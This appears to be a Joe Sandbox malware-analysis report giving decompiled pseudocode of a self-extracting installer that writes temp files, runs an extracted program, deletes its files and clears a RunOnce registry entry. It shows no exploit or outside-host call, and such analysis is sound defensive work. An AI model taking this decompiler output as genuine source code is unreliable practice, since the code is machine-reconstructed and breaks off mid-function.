                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836923961-0
                                                                                                                                                                                                      • Opcode ID: 699f2fc8c4ae4cf97f6d5042b8db4bc3082b184d4e260011aaeea12a963277cd
                                                                                                                                                                                                      • Instruction ID: 5698b6d453f323d421ad9db6f387c85aaf8147f2052ccfcc007bf992f43eb52a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 699f2fc8c4ae4cf97f6d5042b8db4bc3082b184d4e260011aaeea12a963277cd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5411930A443D4CFEB609B6AFD447AE77E4EB54B90F14402AE945FB291CF794880CB41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      control_flow_graph 631 e58c8-e58d5 632 e58d8-e58dd 631->632 632->632 633 e58df-e58f1 LocalAlloc 632->633 634 e5919-e5959 call e1680 call e658a CreateFileA LocalFree 633->634 635 e58f3-e5901 call e44b9 633->635 638 e5906-e5910 call e6285 634->638 645 e595b-e596c CloseHandle GetFileAttributesA 634->645 635->638 644 e5912-e5918 638->644 645->638 646 e596e-e5970 645->646 646->638 647 e5972-e597b 646->647 647->644
                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E000E58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				signed char _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				intOrPtr* _t27;
                                                                                                                                                                                                      				CHAR* _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t27 = __ecx;
                                                                                                                                                                                                      				_t23 = __ecx + 1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t6 =  *_t27;
                                                                                                                                                                                                      					_t27 = _t27 + 1;
                                                                                                                                                                                                      				} while (_t6 != 0);
                                                                                                                                                                                                      				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                      				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                      				if(_t20 != 0) {
                                                                                                                                                                                                      					E000E1680(_t20, _t36, _t33);
                                                                                                                                                                                                      					E000E658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                      					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                      					_v8 = _t10;
                                                                                                                                                                                                      					LocalFree(_t20);
                                                                                                                                                                                                      					_t12 = _v8;
                                                                                                                                                                                                      					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                      						goto L4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						CloseHandle(_t12);
                                                                                                                                                                                                      						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                      						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0xe9124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E000E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					 *0xe9124 = E000E6285();
                                                                                                                                                                                                      					_t14 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t14;
                                                                                                                                                                                                      			}














                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,000E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E58E7
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,000E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E5943
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,000E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E594D
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,000E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E595C
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,000E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E5963
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                      • API String ID: 747627703-3451089282
                                                                                                                                                                                                      • Opcode ID: d3fb3c2f361384cfece0e084d39eb3d811b5a2c8d7d44c7250f267616e299021
                                                                                                                                                                                                      • Instruction ID: 77d16b412b8395c13946b96d65f5a21a32616090205495828f7b5559dc596d4c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3fb3c2f361384cfece0e084d39eb3d811b5a2c8d7d44c7250f267616e299021
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32112671700650AFD7245F7B6C8DADB7E9DDF8A764B100A15B505F72D2CA749C0582A0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph (legend: Executed, Not Executed; rendered graph not preserved)
                                                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                                                      			E000E3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v524;
                                                                                                                                                                                                      				long _v528;
                                                                                                                                                                                                      				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t20;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				int _t25;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t45 = __edx;
                                                                                                                                                                                                      				_t20 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                      				_t39 = __ecx;
                                                                                                                                                                                                      				_t49 = 1;
                                                                                                                                                                                                      				_t22 = 0;
                                                                                                                                                                                                      				if(__ecx == 0) {
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return E000E6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                      				if(_t25 == 0) {
                                                                                                                                                                                                      					 *0xe9124 = E000E6285();
                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                      					_t45 = 0x4c4;
                                                                                                                                                                                                      					E000E44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					_t49 = 0;
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t22 = _t49;
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                      				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                      				_t44 = _v528;
                                                                                                                                                                                                      				_t53 =  *0xe8a28; // 0x0
                                                                                                                                                                                                      				if(_t53 == 0) {
                                                                                                                                                                                                      					_t34 =  *0xe9a2c; // 0x0
                                                                                                                                                                                                      					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                      						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                      						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                      							 *0xe9a2c = _t44;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E000E411B(_t34, _t44);
                                                                                                                                                                                                      				CloseHandle(_v544.hThread);
                                                                                                                                                                                                      				CloseHandle(_v544);
                                                                                                                                                                                                      				if(( *0xe9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 000E4033
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000E4049
                                                                                                                                                                                                      • GetExitCodeProcess.KERNELBASE ref: 000E405C
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000E409C
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000E40A8
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 000E40DC
                                                                                                                                                                                                      • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 000E40E9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3183975587-0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E51E5(void* __eflags) {
                                                                                                                                                                                                      				int _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = E000E468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				if(_t28 != 0) {
                                                                                                                                                                                                      					if(E000E468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                      						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                      						if(_t5 != 0) {
                                                                                                                                                                                                      							_t6 = E000E44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                      							LocalFree(_t28);
                                                                                                                                                                                                      							if(_t6 != 6) {
                                                                                                                                                                                                      								 *0xe9124 = 0x800704c7;
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								return 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *0xe9124 = 0;
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t28);
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E000E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree(_t28);
                                                                                                                                                                                                      					 *0xe9124 = 0x80070714;
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E000E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0xe9124 = E000E6285();
                                                                                                                                                                                                      				goto L10;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                        • Part of subcall function 000E468F: SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                        • Part of subcall function 000E468F: LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                        • Part of subcall function 000E468F: LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                        • Part of subcall function 000E468F: memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                        • Part of subcall function 000E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,000E2F4D,?,00000002,00000000), ref: 000E5201
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 000E5250
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                        • Part of subcall function 000E6285: GetLastError.KERNEL32(000E5BBC), ref: 000E6285
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$UPROMPT
                                                                                                                                                                                                      • API String ID: 957408736-2980973527
                                                                                                                                                                                                      • Opcode ID: 1d9025259bc6dd7b875d283f370e6f86bd130264de7a53bce3ea68f115f1f3cd
                                                                                                                                                                                                      • Instruction ID: ed7bf341db8f05563bd5b1299664b16c2865fd3bd36cf9fda8bf0b86bd536db7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d9025259bc6dd7b875d283f370e6f86bd130264de7a53bce3ea68f115f1f3cd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA11E2B13006C1AFE3646B739C89B7B62DDDB8EB95B10482DB702FA2D1DA7D9C005125
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                                      			E000E52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR** _t31;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 = __edi;
                                                                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                                                                      				_t21 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_t31 =  *0xe91e0; // 0x2d77c60
                                                                                                                                                                                                      				if(_t31 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t29 = _t31;
                                                                                                                                                                                                      						if( *0xe8a24 == 0 &&  *0xe9a30 == 0) {
                                                                                                                                                                                                      							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                      							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t31 = _t31[1];
                                                                                                                                                                                                      						LocalFree( *_t29);
                                                                                                                                                                                                      						LocalFree(_t29);
                                                                                                                                                                                                      					} while (_t31 != 0);
                                                                                                                                                                                                      					_pop(_t28);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 =  *0xe8a20; // 0x0
                                                                                                                                                                                                      				_pop(_t32);
                                                                                                                                                                                                      				if(_t11 != 0 &&  *0xe8a24 == 0 &&  *0xe9a30 == 0) {
                                                                                                                                                                                                      					_push(_t22);
                                                                                                                                                                                                      					E000E1781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                      					if(( *0xe9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                      						E000E65E8( &_v268);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                      					_t22 =  &_v268;
                                                                                                                                                                                                      					E000E2390( &_v268);
                                                                                                                                                                                                      					_t11 =  *0xe8a20; // 0x0
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *0xe9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                      					_t11 = E000E1FE1(_t22); // executed
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *0xe8a20 =  *0xe8a20 & 0x00000000;
                                                                                                                                                                                                      				return E000E6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      0x000e5363
                                                                                                                                                                                                      0x000e5369
                                                                                                                                                                                                      0x000e536f
                                                                                                                                                                                                      0x000e5374
                                                                                                                                                                                                      0x000e5374
                                                                                                                                                                                                      0x000e5381
                                                                                                                                                                                                      0x000e5387
                                                                                                                                                                                                      0x000e5387
                                                                                                                                                                                                      0x000e538f
                                                                                                                                                                                                      0x000e53a0

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(02D77C60,00000080,?,00000000), ref: 000E52F2
                                                                                                                                                                                                      • DeleteFileA.KERNELBASE(02D77C60), ref: 000E52FA
                                                                                                                                                                                                      • LocalFree.KERNEL32(02D77C60,?,00000000), ref: 000E5305
                                                                                                                                                                                                      • LocalFree.KERNEL32(02D77C60), ref: 000E530C
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(000E11FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 000E5363
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 000E5334
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                      • API String ID: 2833751637-183442868
                                                                                                                                                                                                      • Opcode ID: b433ace48913dff9cbaaef7b41eb09297ea3a16bac6f4f7ba4af6e489202db82
                                                                                                                                                                                                      • Instruction ID: cc8f850ed1e4f99b24287e16792f9e944ab06282128db99c06638d4d46ece8ee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b433ace48913dff9cbaaef7b41eb09297ea3a16bac6f4f7ba4af6e489202db82
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A21F6316006C4DFFB709B21ED897A937F0BB04B55F08056AE9457A1B1CFB95E84CB81
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E1FE1(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				if( *0xe8530 != 0) {
                                                                                                                                                                                                      					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                      					if(_t4 == 0) {
                                                                                                                                                                                                      						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                                                                                                                                                                      						return RegCloseKey(_v8);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,000E538C,?,?,000E538C), ref: 000E2005
                                                                                                                                                                                                      • RegDeleteValueA.KERNELBASE(000E538C,wextract_cleanup2,?,?,000E538C), ref: 000E2017
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(000E538C,?,?,000E538C), ref: 000E2020
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                      • API String ID: 849931509-3354236729
                                                                                                                                                                                                      • Opcode ID: c3c6fcee85735ba0c33f6ec6d2d98c9c3c792a2710d6c557c4e183eca3893b33
                                                                                                                                                                                                      • Instruction ID: 500f797c7b70adacca873e59bdb647ad23d08517f8294aa32fb0d50da8cdec0d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3c6fcee85735ba0c33f6ec6d2d98c9c3c792a2710d6c557c4e183eca3893b33
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0E04F32650398FFEB219B92EC8EF597B6DE705B80F100195BA08B80A2EB656E14D705
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E000E4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				long _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				long _t35;
                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                      				struct HWND__* _t37;
                                                                                                                                                                                                      				long _t38;
                                                                                                                                                                                                      				long _t39;
                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                      				long _t44;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				long _t46;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				long _t51;
                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                      				long _t59;
                                                                                                                                                                                                      				char* _t63;
                                                                                                                                                                                                      				long _t64;
                                                                                                                                                                                                      				CHAR* _t71;
                                                                                                                                                                                                      				CHAR* _t74;
                                                                                                                                                                                                      				int _t75;
                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = __edx;
                                                                                                                                                                                                      				_t29 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                      				_v8 = _t30;
                                                                                                                                                                                                      				_t75 = _a8;
                                                                                                                                                                                                      				if( *0xe91d8 == 0) {
                                                                                                                                                                                                      					_t32 = _a4;
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 == 0) {
